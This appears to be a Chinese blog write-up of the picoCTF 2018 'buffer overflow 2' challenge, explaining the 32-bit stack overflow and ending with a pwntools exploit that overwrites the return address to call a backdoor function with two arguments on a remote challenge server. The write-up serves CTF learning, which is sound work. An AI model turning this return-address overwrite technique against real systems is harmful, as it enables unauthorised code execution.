picoctf_2018_buffer overflow 2

作者

check
file
32位,只开了NX

这里溢出
file

有后门函数,需要传两个参数
file
传十六进制补码

file

ida选中数据,右键即可编码
a1 = 0xDEADBEEF
a2 = 0xDEADC0DE

exp:

from pwn import*

#p=process('./pwn')
p=remote('node4.buuoj.cn',26263)
win=0x080485CB
a1=0xDEADBEEF
a2=0xDEADC0DE
payload='a'*(0x6c+4)+p32(win)+'aaaa'+p32(a1)+p32(a2)
p.sendline(payload)
p.interactive()
Post Views: 39

发表评论

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据